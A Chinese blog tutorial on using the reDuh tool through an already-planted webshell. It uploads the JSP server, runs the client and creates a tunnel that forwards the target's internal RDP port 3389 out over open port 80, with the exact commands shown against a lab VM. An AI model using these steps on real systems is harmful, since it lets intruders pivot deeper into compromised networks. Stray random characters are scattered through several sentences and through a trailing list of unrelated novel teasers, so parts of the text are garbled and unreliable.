webshell跳板——reduh的用法介紹

reDuh

0x00 reduh

經(jīng)常我們拿到一個shell后,發(fā)現(xiàn)只將目標服務(wù)器的80端口映射到公網(wǎng)ip地址试浙,無法訪問其他端口,如3389或3306等

這時可以通過reduh做一個跳板,將特定端口通過開放的80端口從內(nèi)網(wǎng)中轉(zhuǎn)發(fā)出來

0x00 So Easy

首先我們需要一個webshell,這里我直接在虛擬機里面寫一個了

image.png

然后通過webshell上傳reduh的服務(wù)端诡延,在\reDuhServers\目錄下
image.png

這里用的jsp的環(huán)境就上傳一個jsp的服務(wù)端
image.png

上傳后的地址為http://192.168.49.154:8080/reDuh.jsp

然后本地通過命令行執(zhí)行reduh的客戶端(位于\reDuhClient\dist\目錄下)

java -jar reDuhClient.jar http://192.168.49.154:8080/reDuh.jsp
image.png

然后通過nc監(jiān)聽本地1010端口

nc.exe -nvv 127.0.0.1 1010
image.png

然后創(chuàng)建隧道,以將3389端口為例

[createTunnel]6666:127.0.0.1:3389

image.png

然后本地通過mstsc連接127.0.0.1:6666
image.png

這時能看到reduh本地客戶端產(chǎn)生了流量
image.png

image.png

這樣就可以通過webshell建立其他端口的通信隧道

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 人面猴
    序言:七十年代末卑笨,一起剝皮案震驚了整個濱河市孕暇,隨后出現(xiàn)的幾起案子仑撞,更是在濱河造成了極大的恐慌赤兴,老刑警劉巖,帶你破解...
    沈念sama閱讀 218,858評論 6 508
  • 死咒
    序言:濱河連續(xù)發(fā)生了三起死亡事件隧哮,死亡現(xiàn)場離奇詭異桶良,居然都是意外死亡,警方通過查閱死者的電腦和手機沮翔,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 93,372評論 3 395
  • 救了他兩次的神仙讓他今天三更去死
    文/潘曉璐 我一進店門陨帆,熙熙樓的掌柜王于貴愁眉苦臉地迎上來,“玉大人,你說我怎么就攤上這事疲牵〕卸” “怎么了?”我有些...
    開封第一講書人閱讀 165,282評論 0 356
  • 道士緝兇錄:失蹤的賣姜人
    文/不壞的土叔 我叫張陵纲爸,是天一觀的道長亥鸠。 經(jīng)常有香客問我,道長识啦,這世上最難降的妖魔是什么负蚊? 我笑而不...
    開封第一講書人閱讀 58,842評論 1 295
  • ?港島之戀(遺憾婚禮)
    正文 為了忘掉前任,我火速辦了婚禮颓哮,結(jié)果婚禮上家妆,老公的妹妹穿的比我還像新娘。我一直安慰自己冕茅,他們只是感情好伤极,可當我...
    茶點故事閱讀 67,857評論 6 392
  • 惡毒庶女頂嫁案:這布局不是一般人想出來的
    文/花漫 我一把揭開白布。 她就那樣靜靜地躺著姨伤,像睡著了一般塑荒。 火紅的嫁衣襯著肌膚如雪。 梳的紋絲不亂的頭發(fā)上姜挺,一...
    開封第一講書人閱讀 51,679評論 1 305
  • 城市分裂傳說
    那天齿税,我揣著相機與錄音,去河邊找鬼炊豪。 笑死凌箕,一個胖子當著我的面吹牛,可吹牛的內(nèi)容都是我干的词渤。 我是一名探鬼主播牵舱,決...
    沈念sama閱讀 40,406評論 3 418
  • 雙鴛鴦連環(huán)套:你想象不到人心有多黑
    文/蒼蘭香墨 我猛地睜開眼,長吁一口氣:“原來是場噩夢啊……” “哼缺虐!你這毒婦竟也來了芜壁?” 一聲冷哼從身側(cè)響起,我...
    開封第一講書人閱讀 39,311評論 0 276
  • 萬榮殺人案實錄
    序言:老撾萬榮一對情侶失蹤高氮,失蹤者是張志新(化名)和其女友劉穎慧妄,沒想到半個月后,有當?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體剪芍,經(jīng)...
    沈念sama閱讀 45,767評論 1 315
  • ?護林員之死
    正文 獨居荒郊野嶺守林人離奇死亡塞淹,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點故事閱讀 37,945評論 3 336
  • ?白月光啟示錄
    正文 我和宋清朗相戀三年,在試婚紗的時候發(fā)現(xiàn)自己被綠了罪裹。 大學時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片饱普。...
    茶點故事閱讀 40,090評論 1 350
  • 活死人
    序言:一個原本活蹦亂跳的男人離奇死亡运挫,死狀恐怖,靈堂內(nèi)的尸體忽然破棺而出套耕,到底是詐尸還是另有隱情谁帕,我是刑警寧澤,帶...
    沈念sama閱讀 35,785評論 5 346
  • ?日本核電站爆炸內(nèi)幕
    正文 年R本政府宣布冯袍,位于F島的核電站雇卷,受9級特大地震影響,放射性物質(zhì)發(fā)生泄漏颠猴。R本人自食惡果不足惜关划,卻給世界環(huán)境...
    茶點故事閱讀 41,420評論 3 331
  • 男人毒藥:我在死后第九天來索命
    文/蒙蒙 一、第九天 我趴在偏房一處隱蔽的房頂上張望翘瓮。 院中可真熱鬧贮折,春花似錦、人聲如沸资盅。這莊子的主人今日做“春日...
    開封第一講書人閱讀 31,988評論 0 22
  • 一樁弒父案,背后竟有這般陰謀
    文/蒼蘭香墨 我抬頭看了看天上的太陽呵扛。三九已至每庆,卻和暖如春,著一層夾襖步出監(jiān)牢的瞬間今穿,已是汗流浹背缤灵。 一陣腳步聲響...
    開封第一講書人閱讀 33,101評論 1 271
  • 情欲美人皮
    我被黑心中介騙來泰國打工, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留蓝晒,地道東北人腮出。 一個月前我還...
    沈念sama閱讀 48,298評論 3 372
  • 代替公主和親
    正文 我出身青樓,卻偏偏與公主長得像芝薇,于是被迫代替她去往敵國和親胚嘲。 傳聞我的和親對象是個殘疾皇子,可洞房花燭夜當晚...
    茶點故事閱讀 45,033評論 2 355

推薦閱讀更多精彩內(nèi)容